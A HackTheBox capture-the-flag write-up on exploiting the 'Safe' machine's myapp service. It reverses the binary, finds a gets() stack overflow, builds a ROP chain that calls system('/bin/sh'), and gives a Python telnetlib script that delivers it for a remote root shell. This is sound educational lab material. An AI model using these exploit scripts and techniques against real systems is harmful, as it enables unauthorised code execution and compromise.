HackTheBox Safe Pwn Write-Up

Safe is an easy difficulty Linux machine. In this write-up we will complete the binary exploitation section of the lab. We will examine a networked CLI application, find a buffer overflow vulnerability, then design and execute a return-oriented programming exploit to gain shell access to the server.

January 11, 2022
HTB | Write-Up | Pwn

HackTheBox

Getting Started

At this section of the lab we have found an unknown service running on port 1337 over TCP by using the Nmap port scanner. We have also found what appears to be a copy of the executable binary named myapp hosted on a web server. We can download this copy of the binary and analyze it locally.

For the purpose of this write-up I will use socat to serve the application locally under the root account using sudo.

Connecting to the application/service with netcat shows us it’s simple functionality. First we do a quick scan with nmap to show that the port is open for connection. We connect to the service and the first thing we see is it sending system uptime information. Next we send it some test inputs (boxed in red) and receive some data back from the application (boxed in green).

It’s a little out of order, but it seems to echo back our input to us, seen clearly with our test2 input. We can also infer that it is running uptime on the server and returning the output to us by testing that program in our local shell and comparing the output. As our server application and local user shell are being run on the same machine, the output is identical, nearly confirming uptime is being run by the server application.

Initial Inspection

After downloading the myapp executable binary from the web server we run it to confirm it has the same functionality as the networked application. Running the program locally we now see it echos back our input in the correct order. I suspect this was just a quirk of how we were serving the program with socat, so moving forward it shouldn’t be an issue.

Running file and ldd shows it is a 64 bit ELF executable, not stripped of debugging information, is dynamically linked and shows us the shared libraries. We can see that this binary was compiled for GNU/Linux and links to the system’s installed libc library.

Let’s list out what we know so far to help us decide how to move forward:

There is a networked application running on the server

We can communicate with this application via TCP connection with netcat

This application runs a system command and returns the output

This application accepts, processes and returns user input in some way

We have access to the application binary for local analysis

The application was compiled for GNU/Linux and dynamically links to the C Standard Library

Buffer Overflow Vulnerability

The first thing we should try is to leverage the user input functionality. This is a very simple yet powerful attack vector. If there are no bounds checking or stack-smashing protections we may be able to overrun this input buffer and access memory elsewhere in the call stack, possibly allowing us to perform a stack buffer overflow attack. We can test for this simply by sending different sized inputs to the program. Triggering a segmentation fault will indicate that we are writing outside of the input buffer and the program is vulnerable to this type of attack. Using python to pipe input to the program we are able to trigger a segmentation fault with an input of 200 characters.

Analyzing and Reversing

We will use gdb with the gef extension to analyze and debug the program. Running the checksec command will check which security protections are enabled in the binary. We can see that the NX bit (no-execute) feature is enabled. This will prevent us from writing instructions directly onto the call stack and executing them. There is also partial RelRO (Relocation Read-Only) protection which reorders the internal data sections to protect them from being overwritten in the event of a buffer overflow.

“From an attackers point-of-view, partial RELRO makes almost no difference, other than it forces the GOT to come before the BSS in memory, eliminating the risk of a buffer overflows on a global variable overwriting GOT entries." ¹

The executable-space protection (NX bit) stops us from simply injecting and executing arbitrary code, so let’s dig deeper into the program and find another way we can leverage the buffer overflow. Running info functions lists the functions in the program as well as their virtual addresses.

puts, system, printf and gets are all functions that are dynamically linked from the libc shared library. The system function really catches my eye as the purpose of this function is to execute shell commands. I suspect this is what is being used to execute uptime, and we may find this useful for our exploit. main and test seem to be functions native to our program, as main is the usual entry point for C programs and because debugging symbols have not been stripped, test is a variable name for an included function as well. Let’s disassemble the main function and look at the resulting assembly code.

This is a very simple program. We will re-create this in C below, but first I want to point out a few things. First and foremost this program is using the gets function to receive standard input from the user, which is a HUGE NO-NO. This is how we are able to buffer overflow the program’s input.

“The gets() function does not perform bounds checking, therefore this function is extremely vulnerable to buffer-overflow attacks. It cannot be used safely (unless the program runs in an environment which restricts what can appear on stdin). For this reason, the function has been deprecated in the third corrigendum to the C99 standard and removed altogether in the C11 standard. fgets() and gets_s() are the recommended replacements. Never use gets()." ²

Now that we’ve addressed the cause of the buffer overflow vulnerability, let’s explore how the call to the system function works. We see that instruction <+8> is loading an address into the RDI register, then instruction <+15> is calling the system function. The RDI register is used to store the address of the first argument for function calls in Linux x86_64. When we run the x/s command on that address, we see it points to the string “/usr/bin/uptime”, so we know the program is executing system("/usr/bin/uptime”), completely confirming our earlier assumption. Understanding how this works will be crucial to the development of our exploit. I also want to point out that the test function is not referenced at all in main. Normally this could be because the function is an artifact of the development process, or dead code, but here I suspect it was created for us to use in our exploitation of this program. Let’s disassemble test and see what it does.

From what I can tell, this function really isn’t doing anything useful, aside from giving us something to use in our exploit. All it does is push the value contained in the RBP register onto the call stack, moves the address pointing to that value into the RDI register via the RSP register, jumps to the address stored in the R13 register, pops RBP off of the call stack, and finally returns to the calling function. I’m not even sure how we could write this in C, but for our source reconstruction we can just use the __asm__ keyword to write the assembly code directly in our C source re-creation.

Here is my attempt at re-creating the original C source code for this program with comments added to help understand what each line translates to in assembly code:

// my_source_myapp.c

// gcc my_source_myapp.c -o my_source_myapp -fno-stack-protector -no-pie -w


int main(void) {

    char echo[112];  //..................................// sub    rsp,0x70

    system("/usr/bin/uptime");  //.......................// lea    rdi,[rip+0xe9a] # 0x402008
                                //.......................// call   0x401040 <system@plt>

    printf("\nWhat do you want me to echo back? ");  //..// lea    rdi,[rip+0xe9e] # 0x402018
                                                     //..// call   0x401050 <printf@plt>

    gets(echo);  //......................................// lea    rax,[rbp-0x70]
                 //......................................// mov    rdi,rax
                 //......................................// call   0x401060 <gets@plt>

    puts(echo);  //......................................// lea    rax,[rbp-0x70]
                 //......................................// mov    rdi,rax
                 //......................................// call   0x401030 <puts@plt>

    return 0;    //......................................// mov    eax,0x0
                 //......................................// leave
                 //......................................// ret
}

void test(void) {
    __asm__(
        "mov %rsp,%rdi\n\t"
        "jmpq *%r13"
	);
}

Compiling using gcc with the flags listed at the top creates nearly identical assembly code for me when inspected with objdump. There are a few unimportant discrepancies, but those are probably the result of minor compiler version/optimization differences and shouldn’t be an issue.

Debugging and Finding the Offset

Let’s run the program in gdb, setting a breakpoint at the call to system to examine the registers at this state of the program runtime. Here we can see that the address pointing to the “uptime” string has been loaded into the RDI register and the RIP (instruction pointer) register contains the address of the system function. The program is set up and ready to execute system("/usr/bin/uptime”) at continuation of execution.

Now let’s halt execution and explore the buffer overflow vulnerability. We’ll first delete the previous breakpoint then use the pattern create command to generate a De Bruijn cyclic pattern of 200 bytes, as we know 200 bytes will cause a segmentation fault and overrun the input buffer used by gets (which we assigned the variable name echo to in our source re-creation). Then we run the program and use that pattern when prompted to supply our input.

As expected we receive a segmentation fault, but now we can examine the current state of the program at the fault and see where are our input is being written.

Using the pattern search command we can see how many bytes we need to input to overwrite the RSP register. The RSP register contains the address the current function will return to when the ret instruction is called. This shows that we need to input 120 bytes to reach the RSP register. We could then write any valid address to that register and that is where the main function will return. Also note that we are overwriting the RBP register as well. When we search for the contents of what RBP contains, we see that it is 112 bytes past the start of our input buffer, or 0x70 in hexadecimal, as the assembly code shows us.

So let’s recap how our input is handled:

The first 112 bytes write to the input buffer, or RSI register

Bytes 113-120 overwrite the RBP register

Bytes 120+ overwrite the RSP register, which is the address where the function will return

If we only send 112 bytes of junk followed by an 8 byte string, “deadbeef”, we can write that string into the RBP register.

Return-Oriented Programming

The limitied binary protections, buffer overflow vulnerability via gets function for user supplied input and easy access to the system function make this program a prime candidate for return-oriented programing exploitation, or ROP for short.

“The concept of ROP is simple but tricky. . . [W]e wil[l] be utilizing small instruction sequences available in either the binary or libraries linked to the application called gadgets. . . ROP gadgets are small instruction sequences ending with a “ret” instruction “c3”. Combining these gadgets will enable us to perform certain tasks and in the end conduct our attack . . . [I]nstead of returning to an address of a function . . . we will return to these ROP gadgets. . . The ROP gadget has to end with a “ret” to enable us to perform multiple sequences. Hence it is called return oriented." ³

Utilizing the ROP method we can find and chain together useful instruction sequences already present in the binary, essentially re-writing the program to do whatever we want by rearranging pre-existing code. Our ultimate goal here is to find and use ROP gadgets to help us massage program data and control flow in a way that spawns a forked command-line shell process through execution of the binary.

ROPEmporium is a great resource to learn more about ROP exploitation and practice your exploit building skills.

Developing a ROP Exploit

Using python we can start to build a framework for our ROP exploit. In our python test function we will construct our input by first sending 112 bytes of “A“s followed by our 8 byte payload string, “deadbeef”, followed by the address to myapp’s test function (using python’s struct module to pack the bytes into proper 8 byte little endian format). The function then writes this to a file named test_payload.txt.

#!/usr/bin/env python3
"""safe_pwn.py"""

import struct

# test
def test() -> None:
    """Test return to test function."""
    payload: bytes = (b"\x41" * 112)  # 112 bytes of 'A's to fill input buffer
    payload += b"deadbeef"  # string to write into rbp
    payload += struct.pack("<q", 0x401152)  # address of test function
    print("Our test payload:\n", payload)
    with open("test_payload.txt", "wb") as test_out:
        test_out.write(payload)


if __name__ == "__main__":
    test()

We run the new python script and generate our ROP test input.

Now we set a breakpoint at the address of myapp’s test function and run the program using our generated payload as the input with run < payload.txt. At the breakpoint we see that now RBP contains the string “deadbeef” and RIP contains the address of test, showing that the test function is the next subroutine the program will execute.

Stepping over the call to test with command n shows us how the function has set up the call stack. The function prologue pushes the value RBP contains onto the stack, decrementing RSP 8 bytes. It then copies the contents of RSP into RBP, so they now both contain the stack address pointing to “deadbeef”. Directly after the function prologue, test copies the value of RSP to the RDI register. Now all three registers, RBP, RSP and RDI, point to the string value “deadbeef”.

jmp r13 is the next instruction test will execute after it copies the stack address of “deadbeef” into RDI. Currently the R13 register doesn’t contain anything useful, but if it contained a valid address to another function, test would then jump to that function and execute it. We need to get a useful string address into RDI, then get the address of the system function into R13. That way we can call system with our payload string as it’s argument, as per the System V X86_64 calling convention. If we get RDI to point to the string “/bin/sh”, then jump to the system address we would spawn a command-line shell on the host machine.

This is where we can utilize the ROP exploitation method. If we can find a ROP gadget (machine instruction sequence accessible by the program that ends with a return instruction) that can pop R13 off of the call stack, we can write the address of the system function to the register and then jump to it in the test function. We could manually search for a gadget but a better option would be to use the python tool ropper. Using this tool within gdb-gef we can easily search for a gadget containing “pop r13” with the command ropper –search “pop r13”.

ropper has found a gadget we can use at the virtual address 0x401206. This gadget not only pops R13, but also pops registers R14 and R15 before it executes the return instruction. These extra instructions will not be an issue, we can write 0x0 to those registers as they will not be used in our exploit.

Testing Our Exploit Method

Let’s list out what we need to send to the program in order to set up a shell command call for /bin/sh:

112 bytes of junk to fill the input buffer

8 byte string for our system argument to overwrite RBP

Address of our ROP gadget to pop registers R13, R14, R15 and then ret to overwrite RSP

Address of the system function to write to R13

0x0 to write to R14

0x0 to write to R15

Address of the test function to write to RSP

We will adapt our previous python test function to include our new payload instructions and write the data to the file payload.txt.

#!/usr/bin/env python3
"""safe_pwn.py"""

import struct

# payload
def exploit() -> bytes:
    """Build our payload."""
    payload: bytes = (b"\x41" * 112)  # overflow junk
    payload += b"/bin/sh\x00"  # rbp : string argument for system function
    payload += struct.pack("<q", 0x401206)  # pop r13 ; pop r14 ; pop r15 ; ret
    payload += struct.pack("<q", 0x401040)  # r13 -> system
    payload += struct.pack("<q", 0x000000)  # r14 : 0x0
    payload += struct.pack("<q", 0x000000)  # r15 : 0x0
    payload += struct.pack("<q", 0x401152)  # test function

    print("Our payload:\n", payload)
    with open("payload.txt", "wb") as payload_out:
        payload_out.write(payload)
    return payload


if __name__ == "__main__":
    exploit()

We run the python script and generate our ROP exploit input.

Again we set a breakpoint at test and run the program with our generated payload as input.

When we hit the breakpoint and step through the subroutine we now have the stack address containing the string “/bin/sh” in the RDI register and the address of the system function in the EIP register. The program is now ready to execute system("/bin/sh”).

Running the program outside of gdb and piping our payload to it as input gives us command-line shell access. Our exploit method is successful.

Exploiting the Networked Application

Running the program locally with our exploit payload piped directly to it as user input worked in getting us system shell access on our local machine, confirming our exploit works on the binary. Now we need to augment our exploit script to connect to the networked application running on the server and communicate with it. Rather than writing our payload to a file like we’ve previously done we can use python’s telnetlib module to establish a TCP connection to the server application and interact with it, emulating a very dumb Telnet client.

#!/usr/bin/env python3
"""safe_pwn.py"""

import struct
from telnetlib import Telnet

HOST: str = "127.0.0.1"
PORT: int = 1337


# payload
def exploit() -> bytes:
    """Build our payload."""
    payload: bytes = (b"\x41" * 112)  # overflow junk
    payload += b"/bin/sh\x00"  # rbp : string argument for system function
    payload += struct.pack("<q", 0x401206)  # pop r13 ; pop r14 ; pop r15 ; ret
    payload += struct.pack("<q", 0x401040)  # r13 -> system
    payload += struct.pack("<q", 0x000000)  # r14 -> 0x0
    payload += struct.pack("<q", 0x000000)  # r15 -> 0x0
    payload += struct.pack("<q", 0x401152)  # test function
    return payload


def main() -> None:
    """Main function. Connect and interact
    with server application."""
    try:
        t_n: Telnet = Telnet(HOST, PORT)
        t_n.read_until(b"\n")
        t_n.write(exploit() + b"\n")
        print("\n[#] SYSTEM PWNED!! [#]\n")
        t_n.interact()
    except KeyboardInterrupt:
        print("\n\n[#] DISCONNECTING [#]\n")
        quit()
    except ConnectionRefusedError:
        print('\n[!] COULD NOT CONNECT TO SERVER [!]\n')
        quit()


if __name__ == "__main__":
    main()

The script establishes a telnet connection to the server application and once it receives a newline control character, sends our payload bytes followed by a newline, simulating a return key-press. It then emulates a minimal telnet client allowing us to run commands and receive the output. We run whoami and hostname to show that we are running a command-line shell on the server with root account privileges.

Conclusion

This was a very trivial exploit performed on a useless, weakly secured, poorly written and implemented application. However contrived the example, this did allow us to touch on a lot of concepts and methods that are applicable to real world exploit development such as binary inspection, binary security and protections, buffer overflow vulnerabilities, reverse engineering C program assembly code, program debugging, return-oreinted programming, and binary exploit development in Python. I enjoyed this section of the lab and learned a lot while completing it, as well as in writing this post and explaining the process.

binary-exploitation/relocation-read-only, ctf101.org. ↩︎
gets, gets_s, cppreference.com. ↩︎
Return-Oriented-Programming(ROP FTW), Saif El-Sherei. ↩︎